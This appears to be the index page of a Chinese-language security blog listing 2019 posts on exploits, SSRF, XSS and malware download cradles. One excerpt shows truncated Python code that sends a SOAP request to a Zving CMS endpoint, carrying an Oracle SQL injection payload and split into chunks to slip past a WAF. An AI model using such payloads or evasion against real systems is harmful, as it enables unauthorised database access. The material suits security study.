Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

关于域名 canonicalizer.ucsuri.tcs

March 20, 2019

关于域名 canonicalizer.ucsuri.tcs

关于域名 canonicalizer.ucsuri.tcs

March 19, 2019

开源项目 | BurpCollector 利用 BurpSuite 收集字典

开源项目 | BurpCollector 利用 BurpSuite 收集字典

March 19, 2019

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

March 18, 2019

【Bug Bounty 阅读笔记】【Synack】 Using AWS Metadata API to escalate SSRF to RCE

Using AWS Metadata API to escalate SSRF to RCE

March 18, 2019

APK 调试遇到 安装失败 的一些问题

APK 调试遇到 安装失败 的一些问题

March 17, 2019

常见 CMS 漏洞 exp 案例集合

常见 CMS 漏洞 exp 案例集合

March 17, 2019

maven 环境配置与简易打包

maven 环境配置与简易打包

March 15, 2019

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

分块传输绕过 WAF <!–more–> 基本信息 import requests from io import BytesIO def read_in_chunks(file_object, chunk_size=3): while True: data = file_object.read(chunk_size) if not data: break yield data data = r”’&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:web=&quot;http://webservice.cms.zving.com&quot;&gt; &lt;soapenv:Header/&gt; &lt;soapenv:Body&gt; &lt;web:addCatalog&gt; &lt;web:in0&gt;2&lt;/web:in0&gt; &lt;web:in1&gt;{sql}&lt;/web:in1&gt; &lt;web:in2&gt;1&lt;/web:in2&gt; &lt;web:in3&gt;1&lt;/web:in3&gt; &lt;/web:addCatalog&gt; &lt;/soapenv:Body&gt; &lt;/soapenv:Envelope&gt;”’ sql = r&quot;’ or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null–&quot; data = BytesIO(data.format(sql=sql)) […]

March 15, 2019

Burp Scanner DOM-based XSS issue

Burp Scanner DOM-based XSS issue

March 14, 2019

Download Cradles 是什么? (Powershell/Malware)

Download Cradles 是什么? (Powershell/Malware)